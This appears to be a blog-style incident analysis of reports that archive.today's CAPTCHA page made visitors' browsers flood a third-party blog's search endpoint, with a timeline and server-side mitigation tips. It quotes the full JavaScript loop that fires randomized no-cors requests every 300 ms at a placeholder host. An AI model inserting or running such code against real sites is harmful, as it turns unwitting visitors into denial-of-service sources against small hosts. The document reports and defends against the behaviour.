A Blog Under Siege: archive.today Reportedly Turning Users Into DDoS Proxies

Incident

A Blog Under Siege: archive.today Reportedly Turning Users Into DDoS Proxies

February 2026 · analysis · tags: archive.today, DDoS, web-archives

TL;DR: Multiple community reports say archive.today’s CAPTCHA page executed client-side JavaScript that repeatedly requested a third-party blog’s search endpoint roughly every 300 ms while the CAPTCHA page was open, creating DDoS-style load. See the original write-up and community threads linked below.

What was observed

According to the initial report, the CAPTCHA page contained a short `setInterval` script that called a site’s search URL with a randomized query string about every 300 milliseconds — preventing caching and keeping a steady stream of requests active while the page was open. A code snippet and screenshots were published by the reporting author. (sources: original report, HN, Reddit)

setInterval(function() {
    fetch("https://example-blog.com/?s=" + Math.random().toString(36).substring(2, 3 + Math.random() * 8), {
        referrerPolicy: "no-referrer",
        mode: "no-cors"
    });
}, 300);

The original report contains screenshots and a line reference in the CAPTCHA HTML for verification; community conversations also examined the behavior and implications.

Timeline & community reaction

The reporting author traces the activity to around early January 2026, documents email exchanges and attempts at remediation, and shows how the blog was later added to DNS/adblock blocklists which prevented those client-side requests for many users. Community discussion and validation followed on Hacker News and Reddit.

Why this matters

Client-side code that repeatedly issues requests to third-party sites can turn ordinary visitors into unknowing request sources. For small blogs and low-capacity hosts, that can cause service disruptions, and it raises questions about responsibility for archival tooling and user-facing anti-abuse pages.

Mitigation suggestions (brief)

  • Rate-limit or throttle search endpoints (return HTTP 429 for excessive traffic patterns).
  • Use CDN/WAF rules to catch high-frequency request patterns and block/serve cached responses.
  • Ignore obviously random short search queries server-side or return cheap cached results.
  • Collect request logs (timestamps, headers, user agents, referrers) for abuse reports and forensics.

Sources & discussion

Comments